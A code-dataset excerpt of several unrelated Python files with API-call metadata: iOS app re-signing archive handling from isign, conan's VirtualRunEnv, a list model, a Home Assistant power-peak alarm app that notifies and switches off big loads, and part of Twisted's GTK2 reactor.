(cls.is_archive_extension_match(path) and zipfile.is_zipfile(path)): log.debug("this is an archive, and a zipfile") zipfile_obj = zipfile.ZipFile(path) relative_bundle_dir = cls.find_bundle_dir(zipfile_obj) if relative_bundle_dir is not None: plist_path = cls._get_plist_path(relative_bundle_dir) if plist_path not in zipfile_obj.namelist(): return False plist = cls.get_info(relative_bundle_dir, zipfile_obj) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def get_info(cls, relative_bundle_dir, zipfile_obj): plist_path = cls._get_plist_path(relative_bundle_dir) plist_bytes = zipfile_obj.read(plist_path) return biplist.readPlistFromString(plist_bytes) def __init__(self, path): self.path = path zipfile_obj = zipfile.ZipFile(path) self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj) self.bundle_info = self.get_info(self.relative_bundle_dir, zipfile_obj) def unarchive_to_temp(self): containing_dir = make_temp_dir() call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir]) app_dir = abspath(join(containing_dir, self.relative_bundle_dir)) process_watchkit(app_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__) @classmethod def archive(cls, containing_dir, output_path): """ archive this up into a zipfile. Note this is a classmethod, because the caller will use us on a temp directory somewhere """ # the temp file is necessary because zip always adds ".zip" if it # does not have an extension. But we want to respect the desired # output_path's extension, which could be ".ipa" or who knows. # So we move it to the output_path later. # # We also do a little dance with making another temp directory just # to construct the zip file. This is the best way to ensure the an unused # filename. Also, `zip` won't overwrite existing files, so this is safer. temp_zip_dir = None try: # need to chdir and use relative paths, because zip is stupid temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-") temp_zip_file = join(temp_zip_dir, 'temp.zip') call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir) shutil.move(temp_zip_file, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) finally: if temp_zip_dir is not None and isdir(temp_zip_dir): shutil.rmtree(temp_zip_dir) class IpaArchive(AppZipArchive): """ IPA is Apple's standard for distributing apps. Much like an AppZip, but slightly different paths """ extensions = ['.ipa'] app_dir_pattern = r'^(Payload/[^/]+\.app/).*$' class UncompressedArchive(object): """ This just keeps track of some state with an unzipped app archive and how to re-zip it back up once re-signed. The bundle is located somewhere inside the containing directory, but might be a few directories down, like in a ContainingDir/Payload/something.app This class is also useful if you have an app that's already unzipped and you want to sign it. """ def __init__(self, path, relative_bundle_dir, archive_class): """ Path is the "Containing dir", the dir at the root level of the unzipped archive (or the dir itself, in the case of an AppArchive archive) relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app archive class is the kind of archive this was (Ipa, etc.) """ self.path = path self.relative_bundle_dir = relative_bundle_dir self.archive_class = archive_class bundle_path = normpath(join(path, relative_bundle_dir)) self.bundle = App(bundle_path) def archive(self, output_path): """ Re-zip this back up, or simply copy it out, depending on what the original archive class did """ self.archive_class.archive(self.path, output_path) def clone(self, target_path): """ Copy the uncompressed archive somewhere else, return initialized UncompressedArchive """ shutil.copytree(self.path, target_path) return self.__class__(target_path, self.relative_bundle_dir, self.archive_class) def remove(self): # the containing dir might be gone already b/c AppArchive simply moves # it to the desired target when done if exists(self.path) and isdir(self.path): log.debug('removing ua: %s', self.path) shutil.rmtree(self.path) def archive_factory(path): """ Guess what kind of archive we are dealing with, return an archive object. Returns None if path did not match any archive type """ archive = None for cls in [IpaArchive, AppZipArchive, AppArchive]: if cls.precheck(path): archive = cls(path) log.debug("File %s matched as %s", path, cls.__name__) break return archive def view(input_path): if not exists(input_path): raise IOError("{0} not found".format(input_path)) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotMatched('No matching archive type found') ua = archive.unarchive_to_temp() bundle_info = ua.bundle.info finally: if ua is not None: ua.remove() return bundle_info def resign(input_path, certificate, key, apple_cert, provisioning_profile, output_path, info_props=None, alternate_entitlements_path=None): """ Unified interface to extract any kind of archive from a temporary file, resign it with these credentials, and create a similar archive for that resigned app """ if not exists(input_path): raise IOError("{0} not found".format(input_path)) log.debug('Signing with apple_cert: {}'.format(apple_cert)) log.debug('Signing with key: {}'.format(key)) log.debug('Signing with certificate: {}'.format(certificate)) log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile)) signer = Signer(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=apple_cert) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotSignable('No matching archive type found') ua = archive.unarchive_to_temp() if info_props: # Override info.plist props of the parent bundle ua.bundle.update_info_props(info_props) ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path) bundle_info = ua.bundle.info ua.archive(output_path) except NotSignable as e: msg = "Not signable: <{0}>: {1}\n".format(input_path, e) log.info(msg) raise finally: if ua is not None: ua.remove() return bundle_info
[((24, 6, 24, 33), 'logging.getLogger', 'logging.getLogger', ({(24, 24, 24, 32): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((39, 11, 39, 44), 'tempfile.mkdtemp', 'tempfile.mkdtemp', (), '', False, 'import tempfile\n'), ((55, 22, 55, 47), 'os.walk', 'os.walk', ({(55, 30, 55, 46): 'root_bundle_path'}, {}), '(root_bundle_path)', False, 'import os\n'), ((382, 13, 384, 47), 'signer.Signer', 'Signer', (), '', False, 'from signer import Signer\n'), ((32, 36, 32, 70), 'distutils.spawn.find_executable', 'spawn.find_executable', ({(32, 58, 32, 69): 'helper_name'}, {}), '(helper_name)', False, 'from distutils import spawn\n'), ((140, 20, 140, 47), 'bundle.is_info_plist_native', 'is_info_plist_native', ({(140, 41, 140, 46): 'plist'}, {}), '(plist)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((146, 11, 146, 30), 'os.path.exists', 'exists', ({(146, 18, 146, 29): 'output_path'}, {}), '(output_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((148, 8, 148, 38), 'shutil.move', 'shutil.move', ({(148, 20, 148, 24): 'path', (148, 26, 148, 37): 'output_path'}, {}), '(path, output_path)', False, 'import shutil\n'), ((159, 8, 159, 37), 'shutil.rmtree', 'shutil.rmtree', ({(159, 22, 159, 36): 'containing_dir'}, {}), '(containing_dir)', False, 'import shutil\n'), ((160, 8, 160, 50), 'shutil.copytree', 'shutil.copytree', ({(160, 24, 160, 33): 'self.path', (160, 35, 160, 49): 'containing_dir'}, {}), '(self.path, containing_dir)', False, 'import shutil\n'), ((213, 15, 213, 54), 'os.path.join', 'join', ({(213, 20, 213, 39): 'relative_bundle_dir', (213, 41, 213, 53): '"""Info.plist"""'}, {}), "(relative_bundle_dir, 'Info.plist')", False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((245, 15, 245, 55), 'biplist.readPlistFromString', 'biplist.readPlistFromString', ({(245, 43, 245, 54): 'plist_bytes'}, {}), '(plist_bytes)', False, 'import biplist\n'), ((249, 22, 249, 43), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(249, 38, 249, 42): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((310, 22, 310, 38), 'bundle.App', 'App', ({(310, 26, 310, 37): 'bundle_path'}, {}), '(bundle_path)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((320, 8, 320, 47), 'shutil.copytree', 'shutil.copytree', ({(320, 24, 320, 33): 'self.path', (320, 35, 320, 46): 'target_path'}, {}), '(self.path, target_path)', False, 'import shutil\n'), ((346, 11, 346, 29), 'os.path.exists', 'exists', ({(346, 18, 346, 28): 'input_path'}, {}), '(input_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((374, 11, 374, 29), 'os.path.exists', 'exists', ({(374, 18, 374, 28): 'input_path'}, {}), '(input_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((59, 21, 59, 33), 'bundle.Bundle', 'Bundle', ({(59, 28, 59, 32): 'path'}, {}), '(path)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((81, 18, 81, 65), 'exceptions.NotSignable', 'NotSignable', ({(81, 30, 81, 64): '"""Cannot yet sign WatchKit bundles"""'}, {}), "('Cannot yet sign WatchKit bundles')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((135, 15, 135, 26), 'os.path.isdir', 'isdir', ({(135, 21, 135, 25): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((147, 12, 147, 38), 'shutil.rmtree', 'shutil.rmtree', ({(147, 26, 147, 37): 'output_path'}, {}), '(output_path)', False, 'import shutil\n'), ((199, 22, 199, 62), 're.match', 're.match', ({(199, 31, 199, 50): 'cls.app_dir_pattern', (199, 52, 199, 61): 'file_name'}, {}), '(cls.app_dir_pattern, file_name)', False, 'import re\n'), ((220, 15, 220, 27), 'os.path.isfile', 'isfile', ({(220, 22, 220, 26): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((223, 18, 223, 55), 'exceptions.MissingHelpers', 'MissingHelpers', ({(223, 33, 223, 54): '"""helpers not present"""'}, {}), "('helpers not present')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((228, 16, 228, 40), 'zipfile.is_zipfile', 'zipfile.is_zipfile', ({(228, 35, 228, 39): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((230, 26, 230, 47), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(230, 42, 230, 46): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((257, 26, 257, 72), 'os.path.join', 'join', ({(257, 31, 257, 45): 'containing_dir', (257, 47, 257, 71): 'self.relative_bundle_dir'}, {}), '(containing_dir, self.relative_bundle_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((276, 27, 276, 64), 'tempfile.mkdtemp', 'tempfile.mkdtemp', (), '', False, 'import tempfile\n'), ((277, 28, 277, 58), 'os.path.join', 'join', ({(277, 33, 277, 45): 'temp_zip_dir', (277, 47, 277, 57): '"""temp.zip"""'}, {}), "(temp_zip_dir, 'temp.zip')", False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((279, 12, 279, 51), 'shutil.move', 'shutil.move', ({(279, 24, 279, 37): 'temp_zip_file', (279, 39, 279, 50): 'output_path'}, {}), '(temp_zip_file, output_path)', False, 'import shutil\n'), ((309, 31, 309, 62), 'os.path.join', 'join', ({(309, 36, 309, 40): 'path', (309, 42, 309, 61): 'relative_bundle_dir'}, {}), '(path, relative_bundle_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((328, 11, 328, 28), 'os.path.exists', 'exists', ({(328, 18, 328, 27): 'self.path'}, {}), '(self.path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((328, 33, 328, 49), 'os.path.isdir', 'isdir', ({(328, 39, 328, 48): 'self.path'}, {}), '(self.path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((330, 12, 330, 36), 'shutil.rmtree', 'shutil.rmtree', ({(330, 26, 330, 35): 'self.path'}, {}), '(self.path)', False, 'import shutil\n'), ((353, 18, 353, 62), 'exceptions.NotMatched', 'NotMatched', ({(353, 29, 353, 61): '"""No matching archive type found"""'}, {}), "('No matching archive type found')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((391, 18, 391, 63), 'exceptions.NotSignable', 'NotSignable', ({(391, 30, 391, 62): '"""No matching archive type found"""'}, {}), "('No matching archive type found')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((65, 34, 65, 47), 'os.path.dirname', 'dirname', ({(65, 42, 65, 46): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((79, 16, 79, 35), 'shutil.rmtree', 'shutil.rmtree', ({(79, 30, 79, 34): 'path'}, {}), '(path)', False, 'import shutil\n'), ((237, 28, 237, 55), 'bundle.is_info_plist_native', 'is_info_plist_native', ({(237, 49, 237, 54): 'plist'}, {}), '(plist)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((282, 44, 282, 63), 'os.path.isdir', 'isdir', ({(282, 50, 282, 62): 'temp_zip_dir'}, {}), '(temp_zip_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((283, 16, 283, 43), 'shutil.rmtree', 'shutil.rmtree', ({(283, 30, 283, 42): 'temp_zip_dir'}, {}), '(temp_zip_dir)', False, 'import shutil\n')]
dscole/conan
conan/tools/env/virtualrunenv.py
ff7b8e6703e8407773968517d68424b9ec59aa30
from conan.tools.env import Environment def runenv_from_cpp_info(conanfile, cpp_info): """ return an Environment deducing the runtime information from a cpp_info """ dyn_runenv = Environment(conanfile) if cpp_info is None: # This happens when the dependency is a private one = BINARY_SKIP return dyn_runenv if cpp_info.bin_paths: # cpp_info.exes is not defined yet dyn_runenv.prepend_path("PATH", cpp_info.bin_paths) # If it is a build_require this will be the build-os, otherwise it will be the host-os if cpp_info.lib_paths: dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths) dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths) if cpp_info.framework_paths: dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths) return dyn_runenv class VirtualRunEnv: """ captures the conanfile environment that is defined from its dependencies, and also from profiles """ def __init__(self, conanfile): self._conanfile = conanfile def environment(self): """ collects the runtime information from dependencies. For normal libraries should be very occasional """ runenv = Environment(self._conanfile) # FIXME: Missing profile info # FIXME: Cache value? host_req = self._conanfile.dependencies.host test_req = self._conanfile.dependencies.test for _, dep in list(host_req.items()) + list(test_req.items()): if dep.runenv_info: runenv.compose_env(dep.runenv_info) runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info)) return runenv def generate(self, auto_activate=False): run_env = self.environment() if run_env: run_env.save_script("conanrunenv", auto_activate=auto_activate)
[((7, 17, 7, 39), 'conan.tools.env.Environment', 'Environment', ({(7, 29, 7, 38): 'conanfile'}, {}), '(conanfile)', False, 'from conan.tools.env import Environment\n'), ((33, 17, 33, 45), 'conan.tools.env.Environment', 'Environment', ({(33, 29, 33, 44): 'self._conanfile'}, {}), '(self._conanfile)', False, 'from conan.tools.env import Environment\n')]
rrickgauer/lists
src/api/api_lists/models/list.py
371de6af332789ef386392fd24857702794d05a6
""" ********************************************************************************** List model ********************************************************************************** """ from enum import Enum from dataclasses import dataclass from uuid import UUID from datetime import datetime class ListType(str, Enum): LIST : str = 'list' TEMPLATE: str = 'template' @classmethod def _missing_(cls, value): return ListType.LIST @dataclass class List: id : UUID = None user_id : UUID = None name : str = None created_on: datetime = None type : ListType = ListType.LIST
[]
azogue/hassio_config
config/appdaemon/apps/power_alarm.py
591f158794c173d6391179ab2f52348d58c49aad
# -*- coding: utf-8 -*- """ Automation task as a AppDaemon App for Home Assistant - current meter PEAK POWER notifications """ import datetime as dt from enum import IntEnum import appdaemon.plugins.hass.hassapi as hass LOG_LEVEL = "INFO" LOG_LEVEL_ALERT = "WARNING" LOGGER = "special_event_log" COEF_CRITICAL_LIMIT = 1.1 # 10% over limit MIN_TIME_TURN_OFF_AC = 60 # secs # Big power consumers BIG_CONSUMER_1_CLIMATE = "switch.ac_dry_contact" BIG_CONSUMER_1_LABEL = "aire acondicionado" BIG_CONSUMER_2 = "switch.calentador" BIG_CONSUMER_2_LABEL = "calentador" _IOS_SOUND_POWER_PEAK = "US-EN-Morgan-Freeman-Vacate-The-Premises.wav" class TypeNotif(IntEnum): """ Handler for different kinds of power notifications. Used to centralize push message construction. """ ALERT_OFF = 0 ALERT_ON = 1 ALERT_CRITICAL = 2 def make_ios_push_data(self, data_msg: dict) -> dict: if self.value == self.ALERT_CRITICAL: push_data = { "category": "powerpeak", "badge": 10, "sound": _IOS_SOUND_POWER_PEAK, "critical": 1, "volume": 1.0, "thread-id": "power-peak-group", } elif self.value == self.ALERT_ON: push_data = { "category": "powerpeak", "thread-id": "power-peak-group", "badge": 1, "critical": 1, "sound": _IOS_SOUND_POWER_PEAK, } else: push_data = { "category": "confirm", "thread-id": "power-peak-group", "sound": _IOS_SOUND_POWER_PEAK, "badge": 0, } data_msg["data"] = {"push": push_data} return data_msg def make_telegram_push_data(self, data_msg: dict, target: int) -> dict: data_msg["target"] = target data_msg["disable_notification"] = self.value == self.ALERT_OFF data_msg["inline_keyboard"] = [ [("Luces ON", "/luceson"), ("Luces OFF", "/lucesoff")], [ ("Potencia eléctrica", "/enerpi"), ("Grafs. enerPI", "/enerpitiles"), ], [ ( "Calentador OFF", "/service_call switch/turn_off switch.calentador", ), ( "AC OFF", "/service_call switch/turn_off switch.ac_dry_contact", ), ], ] return data_msg def make_notification_message( self, current_peak, last_trigger, alarm_start, devices_off="", pow_instant=0.0, pow_sustained=0.0, ) -> dict: if self.value == self.ALERT_CRITICAL: return { "title": "¡El automático está a punto de saltar!", "message": ( f"Apagando {devices_off} para intentar evitar " "la sobrecarga eléctrica." ), } time_now = ( "{:%H:%M:%S}".format(last_trigger) if last_trigger is not None else "???" ) if self.value == self.ALERT_ON: data_msg = { "title": "Alto consumo eléctrico!", "message": ( f"Peak: {current_peak} W en {time_now}. " f"Ahora {pow_instant} W ({pow_sustained} sostenidos)" ), } data_msg["message"] = data_msg["message"].format( current_peak, time_now, pow_instant, pow_sustained ) else: duration_min = ( dt.datetime.now() - alarm_start ).total_seconds() / 60.0 data_msg = { "title": "Consumo eléctrico: Normal", "message": ( f"Potencia normal desde {time_now}, " f"Pico de potencia: {current_peak} W. " f"Alerta iniciada hace {duration_min:.1f} min." ), } return data_msg # noinspection PyClassHasNoInit class PeakNotifier(hass.Hass): """ App to notify power peaks (when they are greater than a certain limit), and after that, notify when back to normal (< lower limit). """ # Limit Values _max_peak: float _upper_limit: float _lower_limit: float _min_time_high: int _min_time_low: int # App user inputs _main_power: str _main_power_peak: str _notifier: str _target_sensor: str _alarm_state: bool = False _critical_alarm_state: bool = False _last_trigger = None _alarm_start = None _turn_off_measure_taken = False _current_peak = 0 def initialize(self): """AppDaemon required method for app init.""" self._main_power = self.args.get("sustained_power") self._main_power_peak = self.args.get("instant_power") self._notifier = self.config.get("notifier").replace(".", "/") self._target_sensor = self.config.get("chatid_sensor") # Power limits self._upper_limit = float(self.args.get("max_power_kw")) * 1000.0 self._lower_limit = float(self.args.get("max_power_kw_reset")) * 1000.0 self._min_time_high = int(self.args.get("min_time_high")) self._min_time_low = int(self.args.get("min_time_low")) # TODO implement _max_peak over _instant_power self._max_peak = float(self.args.get("max_power_peak_kw")) * 1000.0 # Listen for Main Power changes: self.listen_state(self.main_power_change, self._main_power) self.log( f"PeakNotifier Initialized. P={self._main_power}, " f"with P>{self._upper_limit} W for {self._min_time_high} secs, " f"(low={self._lower_limit} W for {self._min_time_low} secs). " f"Notify: {self._notifier}.", level=LOG_LEVEL, log=LOGGER, ) def notify_alert(self, type_notif: TypeNotif, data: dict): ios_alarm_msg = type_notif.make_ios_push_data(data.copy()) tlg_alarm_msg = type_notif.make_telegram_push_data( data.copy(), target=int(self.get_state(self._target_sensor)), ) self.call_service(self._notifier, **ios_alarm_msg) self.call_service("telegram_bot/send_message", **tlg_alarm_msg) # noinspection PyUnusedLocal def peak_power_change(self, entity, attribute, old, new, kwargs): """Power Peak ALARM logic control.""" try: new = int(float(new)) except ValueError: return # Update peak if new > self._upper_limit and new > self._current_peak: self._current_peak = new # noinspection PyUnusedLocal def main_power_change(self, entity, attribute, old, new, kwargs): """Sustained Power ALARM logic control.""" try: new = int(float(new)) except ValueError: return now = dt.datetime.now() if not self._alarm_state and (new > self._upper_limit): if new > self._current_peak: self._current_peak = new # Pre-Alarm state, before trigger if self._last_trigger is None: # Start power peak event self.log( "New power peak event at {} with P={} W".format(now, new), level=LOG_LEVEL, log=LOGGER, ) self._last_trigger = now elif ( now - self._last_trigger ).total_seconds() > self._min_time_high: # TRIGGER ALARM self._alarm_start = now self._turn_off_measure_taken = False type_notif = TypeNotif.ALERT_ON data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, pow_instant=self.get_state(self._main_power_peak), pow_sustained=new, ) self.log( f"TRIGGER ALARM with msg={data}", level=LOG_LEVEL_ALERT, log=LOGGER, ) self.notify_alert(type_notif, data) self._alarm_state = True self._critical_alarm_state = False self._last_trigger = now # else: # wait some more time # (this is the same power peak event, # waiting min time to trigger alarm) # pass elif self._alarm_state: # Alarm state, waiting for reset if new > self._current_peak: self._current_peak = new if ( not self._turn_off_measure_taken and new > self._upper_limit * COEF_CRITICAL_LIMIT ): self.log( "ENABLE CRITICAL ALARM with {} W".format(new), level=LOG_LEVEL_ALERT, log=LOGGER, ) self._critical_alarm_state = True elif new < self._lower_limit: if ( now - self._last_trigger ).total_seconds() > self._min_time_low: # RESET ALARM type_notif = TypeNotif.ALERT_OFF data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, ) self.log( "RESET ALARM MODE at {}".format(now), level=LOG_LEVEL, log=LOGGER, ) self.notify_alert(type_notif, data) self._alarm_state = False self._critical_alarm_state = False self._last_trigger = None self._alarm_start = None self._turn_off_measure_taken = False self._current_peak = 0 elif ( not self._turn_off_measure_taken and self._critical_alarm_state and new < self._upper_limit ): self.log( "DISABLE CRITICAL ALARM (now {} W)".format(new), level=LOG_LEVEL_ALERT, log=LOGGER, ) self._critical_alarm_state = False elif ( not self._turn_off_measure_taken and self._critical_alarm_state and ( (now - self._alarm_start).total_seconds() > MIN_TIME_TURN_OFF_AC ) ): # Turn off AC if AC + heater are ON self._turn_off_measure_taken = True self._critical_alarm_state = False devices_turning_off = "" if self.get_state(BIG_CONSUMER_1_CLIMATE) == "on": devices_turning_off = BIG_CONSUMER_1_LABEL self.call_service("climate/turn_off", entity_id="all") elif self.get_state(BIG_CONSUMER_2) == "on": devices_turning_off = BIG_CONSUMER_2_LABEL self.call_service( "switch/turn_off", entity_id=BIG_CONSUMER_2 ) if devices_turning_off: # Notification of devices turned off self.log( f"CRITICAL ACTION: Turn off '{devices_turning_off}'", level="ERROR", log=LOGGER, ) type_notif = TypeNotif.ALERT_CRITICAL data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, devices_off=devices_turning_off, pow_instant=self.get_state(self._main_power_peak), pow_sustained=new, ) self.notify_alert(type_notif, data) self._last_trigger = now else: self._last_trigger = now elif (self._last_trigger is not None) and ( (now - self._last_trigger).total_seconds() > self._min_time_low ): # Normal operation, reset last trigger if no more in min_time_lower self.log( "RESET LAST TRIGGER (was in {})".format(self._last_trigger), level=LOG_LEVEL, log=LOGGER, ) self._last_trigger = None self._current_peak = 0
[((223, 14, 223, 31), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n'), ((128, 16, 128, 33), 'datetime.datetime.now', 'dt.datetime.now', ({}, {}), '()', True, 'import datetime as dt\n')]
SPIN-UMass/SWEET
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/build/lib.linux-x86_64-2.6/twisted/internet/gtk2reactor.py
1b0f39222e7064f70812e3293ca023619295741d
# -*- test-case-name: twisted.internet.test -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This module provides support for Twisted to interact with the glib/gtk2 mainloop. In order to use this support, simply do the following:: | from twisted.internet import gtk2reactor | gtk2reactor.install() Then use twisted.internet APIs as usual. The other methods here are not intended to be called directly. When installing the reactor, you can choose whether to use the glib event loop or the GTK+ event loop which is based on it but adds GUI integration. """ # System Imports import sys, signal from zope.interface import implements try: if not hasattr(sys, 'frozen'): # Don't want to check this for py2exe import pygtk pygtk.require('2.0') except (ImportError, AttributeError): pass # maybe we're using pygtk before this hack existed. import gobject if hasattr(gobject, "threads_init"): # recent versions of python-gtk expose this. python-gtk=2.4.1 # (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping # glib-2.2.3) does not. gobject.threads_init() # Twisted Imports from twisted.python import log, runtime, failure from twisted.python.compat import set from twisted.internet.interfaces import IReactorFDSet from twisted.internet import main, base, posixbase, error, selectreactor POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL # glib's iochannel sources won't tell us about any events that we haven't # asked for, even if those events aren't sensible inputs to the poll() # call. INFLAGS = gobject.IO_IN | POLL_DISCONNECTED OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED def _our_mainquit(): # XXX: gtk.main_quit() (which is used for crash()) raises an exception if # gtk.main_level() == 0; however, all the tests freeze if we use this # function to stop the reactor. what gives? (I believe this may have been # a stupid mistake where I forgot to import gtk here... I will remove this # comment if the tests pass) import gtk if gtk.main_level(): gtk.main_quit() class Gtk2Reactor(posixbase.PosixReactorBase): """ GTK+-2 event loop reactor. @ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk watch handles. @ivar _reads: A set of L{FileDescriptor} instances currently monitored for reading. @ivar _writes: A set of L{FileDescriptor} instances currently monitored for writing. @ivar _simtag: A gtk timeout handle for the next L{simulate} call. """ implements(IReactorFDSet) def __init__(self, useGtk=True): self._simtag = None self._reads = set() self._writes = set() self._sources = {} posixbase.PosixReactorBase.__init__(self) # pre 2.3.91 the glib iteration and mainloop functions didn't release # global interpreter lock, thus breaking thread and signal support. if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk: self.context = gobject.main_context_default() self.__pending = self.context.pending self.__iteration = self.context.iteration self.loop = gobject.MainLoop() self.__crash = self.loop.quit self.__run = self.loop.run else: import gtk self.__pending = gtk.events_pending self.__iteration = gtk.main_iteration self.__crash = _our_mainquit self.__run = gtk.main if runtime.platformType == 'posix': def _handleSignals(self): # Let the base class do its thing, but pygtk is probably # going to stomp on us so go beyond that and set up some # signal handling which pygtk won't mess with. This would # be better done by letting this reactor select a # different implementation of installHandler for # _SIGCHLDWaker to use. Then, at least, we could fall # back to our extension module. See #4286. from twisted.internet.process import reapAllProcesses as _reapAllProcesses base._SignalReactorMixin._handleSignals(self) signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses)) if getattr(signal, "siginterrupt", None) is not None: signal.siginterrupt(signal.SIGCHLD, False) # Like the base, reap processes now in case a process # exited before the handlers above were installed. _reapAllProcesses() # The input_add function in pygtk1 checks for objects with a # 'fileno' method and, if present, uses the result of that method # as the input source. The pygtk2 input_add does not do this. The # function below replicates the pygtk1 functionality. # In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and # g_io_add_watch() takes different condition bitfields than # gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this # bug. def input_add(self, source, condition, callback): if hasattr(source, 'fileno'): # handle python objects def wrapper(source, condition, real_s=source, real_cb=callback): return real_cb(real_s, condition) return gobject.io_add_watch(source.fileno(), condition, wrapper) else: return gobject.io_add_watch(source, condition, callback) def _add(self, source, primary, other, primaryFlag, otherFlag): """ Add the given L{FileDescriptor} for monitoring either for reading or writing. If the file is already monitored for the other operation, we delete the previous registration and re-register it for both reading and writing. """ if source in primary: return flags = primaryFlag if source in other: gobject.source_remove(self._sources[source]) flags |= otherFlag self._sources[source] = self.input_add(source, flags, self.callback) primary.add(source) def addReader(self, reader): """ Add a L{FileDescriptor} for monitoring of data available to read. """ self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS) def addWriter(self, writer): """ Add a L{FileDescriptor} for monitoring ability to write data. """ self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS) def getReaders(self): """ Retrieve the list of current L{FileDescriptor} monitored for reading. """ return list(self._reads) def getWriters(self): """ Retrieve the list of current L{FileDescriptor} monitored for writing. """ return list(self._writes) def removeAll(self): """ Remove monitoring for all registered L{FileDescriptor}s. """ return self._removeAll(self._reads, self._writes) def _remove(self, source, primary, other, flags): """ Remove monitoring the given L{FileDescriptor} for either reading or writing. If it's still monitored for the other operation, we re-register the L{FileDescriptor} for only that operation. """ if source not in primary: return gobject.source_remove(self._sources[source]) primary.remove(source) if source in other: self._sources[source] = self.input_add( source, flags, self.callback) else: self._sources.pop(source) def removeReader(self, reader): """ Stop monitoring the given L{FileDescriptor} for reading. """ self._remove(reader, self._reads, self._writes, OUTFLAGS) def removeWriter(self, writer): """ Stop monitoring the given L{FileDescriptor} for writing. """ self._remove(writer, self._writes, self._reads, INFLAGS) doIterationTimer = None def doIterationTimeout(self, *args): self.doIterationTimer = None return 0 # auto-remove def doIteration(self, delay): # flush some pending events, return if there was something to do # don't use the usual "while self.context.pending(): self.context.iteration()" # idiom because lots of IO (in particular test_tcp's # ProperlyCloseFilesTestCase) can keep us from ever exiting. log.msg(channel='system', event='iteration', reactor=self) if self.__pending(): self.__iteration(0) return # nothing to do, must delay if delay == 0: return # shouldn't delay, so just return self.doIterationTimer = gobject.timeout_add(int(delay * 1000), self.doIterationTimeout) # This will either wake up from IO or from a timeout. self.__iteration(1) # block # note: with the .simulate timer below, delays > 0.1 will always be # woken up by the .simulate timer if self.doIterationTimer: # if woken by IO, need to cancel the timer gobject.source_remove(self.doIterationTimer) self.doIterationTimer = None def crash(self): posixbase.PosixReactorBase.crash(self) self.__crash() def run(self, installSignalHandlers=1): self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) if self._started: self.__run() def _doReadOrWrite(self, source, condition, faildict={ error.ConnectionDone: failure.Failure(error.ConnectionDone()), error.ConnectionLost: failure.Failure(error.ConnectionLost()), }): why = None inRead = False if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN): if source in self._reads: why = main.CONNECTION_DONE inRead = True else: why = main.CONNECTION_LOST else: try: if condition & gobject.IO_IN: why = source.doRead() inRead = True if not why and condition & gobject.IO_OUT: # if doRead caused connectionLost, don't call doWrite # if doRead is doWrite, don't call it again. if not source.disconnected: why = source.doWrite() 